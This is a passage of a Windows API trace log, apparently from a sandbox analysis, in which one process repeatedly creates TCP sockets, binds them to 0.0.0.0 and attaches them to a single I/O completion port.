addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.072] CreateIoCompletionPort (FileHandle=0x3a8, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.072] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3ac [0137.072] bind (s=0x3ac, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.072] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.072] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3b0 [0137.072] bind (s=0x3b0, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.072] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.073] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3b4 [0137.073] bind (s=0x3b4, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.073] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.073] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3b8 [0137.073] bind (s=0x3b8, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.073] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.073] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3bc [0137.074] bind (s=0x3bc, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.074] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.074] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3c0 [0137.074] bind (s=0x3c0, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.074] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.074] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3c4 [0137.074] bind (s=0x3c4, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.075] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.075] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3c8 [0137.075] bind (s=0x3c8, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.075] CreateIoCompletionPort (FileHandle=0x3c8, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.075] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3cc [0137.075] bind (s=0x3cc, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.075] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.076] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3d0 [0137.076] bind (s=0x3d0, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.076] CreateIoCompletionPort (FileHandle=0x3d0, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.076] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3d4 [0137.076] bind (s=0x3d4, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.076] CreateIoCompletionPort (FileHandle=0x3d4, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.076] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3d8 [0137.077] bind (s=0x3d8, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.077] CreateIoCompletionPort (FileHandle=0x3d8, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.079] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3dc [0137.079] bind (s=0x3dc, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.079] CreateIoCompletionPort (FileHandle=0x3dc, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.080] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3e0 [0137.080] bind (s=0x3e0, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.080] CreateIoCompletionPort (FileHandle=0x3e0, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.080] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3e4 [0137.080] bind (s=0x3e4, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.080] CreateIoCompletionPort (FileHandle=0x3e4, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.081] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3e8 [0137.081] bind (s=0x3e8, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.081] CreateIoCompletionPort (FileHandle=0x3e8, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.081] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3ec [0137.081] bind (s=0x3ec, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.081] CreateIoCompletionPort (FileHandle=0x3ec, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.081] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3f0 [0137.082] bind (s=0x3f0, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.082] CreateIoCompletionPort (FileHandle=0x3f0, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.082] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3f4 [0137.082] bind (s=0x3f4, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.082] CreateIoCompletionPort (FileHandle=0x3f4, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.082] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3f8 [0137.083] bind (s=0x3f8, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.083] CreateIoCompletionPort (FileHandle=0x3f8, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.083] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3fc [0137.083] bind (s=0x3fc, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.083] CreateIoCompletionPort (FileHandle=0x3fc, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.083] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x404 [0137.084] bind (s=0x404, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.084] CreateIoCompletionPort (FileHandle=0x404, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.084] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x408 [0137.084] bind (s=0x408, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.084] CreateIoCompletionPort (FileHandle=0x408, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.084] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x40c [0137.085] bind (s=0x40c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.085] CreateIoCompletionPort (FileHandle=0x40c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.085] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x410 [0137.085] bind (s=0x410, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.085] CreateIoCompletionPort (FileHandle=0x410, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.085] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x414 [0137.085] bind (s=0x414, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.085] CreateIoCompletionPort (FileHandle=0x414, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.086] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x418 [0137.086] bind (s=0x418, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.086] CreateIoCompletionPort (FileHandle=0x418, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.086] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x41c [0137.086] bind (s=0x41c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.086] CreateIoCompletionPort (FileHandle=0x41c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.087] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x420 [0137.087] bind (s=0x420, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.087] CreateIoCompletionPort (FileHandle=0x420, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.088] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x424 [0137.088] bind (s=0x424, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.088] CreateIoCompletionPort (FileHandle=0x424, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.088] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x428 [0137.088] bind (s=0x428, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.088] CreateIoCompletionPort (FileHandle=0x428, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.089] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x42c [0137.089] bind (s=0x42c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.089] CreateIoCompletionPort (FileHandle=0x42c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.089] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x430 [0137.089] bind (s=0x430, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.089] CreateIoCompletionPort (FileHandle=0x430, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.090] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x434 [0137.090] bind (s=0x434, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.090] CreateIoCompletionPort (FileHandle=0x434, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.090] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x438 [0137.090] bind (s=0x438, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.090] CreateIoCompletionPort (FileHandle=0x438, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.090] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x43c [0137.091] bind (s=0x43c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.091] CreateIoCompletionPort (FileHandle=0x43c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.091] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x440 [0137.091] bind (s=0x440, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.091] CreateIoCompletionPort (FileHandle=0x440, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.091] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x444 [0137.092] bind (s=0x444, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.092] CreateIoCompletionPort (FileHandle=0x444, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.092] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x448 [0137.092] bind (s=0x448, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.092] CreateIoCompletionPort (FileHandle=0x448, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.092] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x44c [0137.092] bind (s=0x44c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.093] CreateIoCompletionPort (FileHandle=0x44c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.093] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x450 [0137.093] bind (s=0x450, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.093] CreateIoCompletionPort (FileHandle=0x450, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.093] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x454 [0137.094] bind (s=0x454, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.094] CreateIoCompletionPort (FileHandle=0x454, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.094] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x458 [0137.094] bind (s=0x458, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.094] CreateIoCompletionPort (FileHandle=0x458, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.094] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x45c [0137.095] bind (s=0x45c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.095] CreateIoCompletionPort (FileHandle=0x45c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.095] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x460 [0137.095] bind (s=0x460, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.095] CreateIoCompletionPort (FileHandle=0x460, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.095] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x464 [0137.095] bind (s=0x464, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.096] CreateIoCompletionPort (FileHandle=0x464, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.096] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x468 [0137.096] bind (s=0x468, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.096] CreateIoCompletionPort (FileHandle=0x468, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.096] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x46c [0137.096] bind (s=0x46c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.096] CreateIoCompletionPort (FileHandle=0x46c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.097] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x470 [0137.097] bind (s=0x470, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.097] CreateIoCompletionPort (FileHandle=0x470, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.097] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x474 [0137.097] bind (s=0x474, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.097] CreateIoCompletionPort (FileHandle=0x474, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.097] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x478 [0137.098] bind (s=0x478, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.098] CreateIoCompletionPort (FileHandle=0x478, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.098] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x47c [0137.098] bind (s=0x47c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.098] CreateIoCompletionPort (FileHandle=0x47c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.098] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x480 [0137.099] bind (s=0x480, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.099] CreateIoCompletionPort (FileHandle=0x480, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.099] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x484 [0137.099] bind (s=0x484, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.099] CreateIoCompletionPort (FileHandle=0x484, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.099] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x488 [0137.100] bind (s=0x488, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.100] CreateIoCompletionPort (FileHandle=0x488, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.100] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x48c [0137.100] bind (s=0x48c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.100] CreateIoCompletionPort (FileHandle=0x48c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.100] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x490 [0137.100] bind (s=0x490, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.101] CreateIoCompletionPort (FileHandle=0x490, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.101] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x494 [0137.101] bind (s=0x494, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.101] CreateIoCompletionPort (FileHandle=0x494, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.101] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x498 [0137.101] bind (s=0x498, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.102] CreateIoCompletionPort (FileHandle=0x498, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.102] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x49c [0137.102] bind (s=0x49c, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.102] CreateIoCompletionPort (FileHandle=0x49c, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.102] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4a0 [0137.102] bind (s=0x4a0, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.102] CreateIoCompletionPort (FileHandle=0x4a0, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.103] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4a4 [0137.103] bind (s=0x4a4, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.103] CreateIoCompletionPort (FileHandle=0x4a4, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.103] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4a8 [0137.104] bind (s=0x4a8, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.104] CreateIoCompletionPort (FileHandle=0x4a8, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.104] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4ac [0137.104] bind (s=0x4ac, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.104] CreateIoCompletionPort (FileHandle=0x4ac, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.104] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4b0 [0137.105] bind (s=0x4b0, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.105] CreateIoCompletionPort (FileHandle=0x4b0, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.105] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4b4 [0137.105] bind (s=0x4b4, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.105] CreateIoCompletionPort (FileHandle=0x4b4, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.105] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4b8 [0137.106] bind (s=0x4b8, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.106] CreateIoCompletionPort (FileHandle=0x4b8, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.106] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4bc [0137.106] bind (s=0x4bc, addr=0x73dff3c*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0137.106] CreateIoCompletionPort (FileHandle=0x4bc, ExistingCompletionPort=0x2ac, CompletionKey=0x2, NumberOfConcurrentThreads=0x0) returned 0x2ac [0137.106] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, 